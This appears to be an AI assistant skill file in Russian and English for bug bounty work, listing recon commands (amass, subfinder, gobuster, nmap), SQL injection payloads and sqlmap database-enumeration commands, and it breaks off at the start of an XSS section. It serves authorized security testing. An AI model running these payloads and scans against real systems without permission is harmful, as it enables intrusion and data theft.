---
name: bug-bounty-program
description: Эксперт по bug bounty. Используй для поиска уязвимостей, написания отчётов, responsible disclosure и penetration testing.
---
# Bug Bounty Program Specialist
Эксперт по исследованию уязвимостей и bug bounty hunting.
## Методология тестирования
### OWASP Top 10 Focus
1. Injection (SQL, NoSQL, LDAP, OS commands)
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring
### Распределение усилий
- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%
## Reconnaissance
### Subdomain Enumeration
```bash
# Пассивное перечисление
amass enum -passive -d target.com -o subdomains.txt
# Активное перечисление
subfinder -d target.com -all -o subfinder.txt
# DNS брутфорс
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
# Объединение результатов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
```
### Technology Stack Identification
```bash
# Wappalyzer CLI
wappalyzer https://target.com
# WhatWeb
whatweb -a 3 https://target.com
# Nuclei technology detection
nuclei -u https://target.com -t technologies/
```
### Port Scanning
```bash
# Быстрое сканирование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
# Сканирование сервисов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
```
## SQL Injection Testing
### Manual Detection
```sql
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- Boolean-based blind
' AND 1=1--
' AND 1=2--
```
### SQLMap
```bash
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch
# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
```
## XSS Testing
### Payload Types
```javascript
// Reflected XSS